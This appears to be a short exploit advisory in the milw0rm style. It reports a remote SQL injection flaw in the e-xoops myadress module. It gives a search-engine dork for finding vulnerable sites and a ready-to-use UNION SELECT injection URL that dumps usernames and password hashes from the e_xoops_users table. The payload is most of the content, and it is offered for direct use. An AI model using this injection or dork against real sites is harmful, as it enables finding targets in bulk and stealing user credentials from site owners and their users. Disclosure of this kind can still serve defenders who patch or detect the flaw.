The e-xoops myadress module suffers from a remote SQL injection vulnerability.
ff6ae0aec851ab0621b939970e422ad06e705167cde0920c3cf07c34d5d42212
###############################################################
#
###########powered by e-xoops(myadress)SQL Injection
#
###############################################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
##DORK 1 : allinurl: "/modules/myadress/"
#
################################################################
EXPLOIT :
modules/myadress/index.php?pa=view&cid=999+union/**/select+000,concat(uname,0x3a,pass)/**/from/**/e_xoops_users/*where%20myadress%201
################################################################
#------------------------------------------------S@BUN------------------------------------------------#
################################################################
#------S@BUN---------------------i AM NOT HACKER----------------S@BUN-------------#
################################################################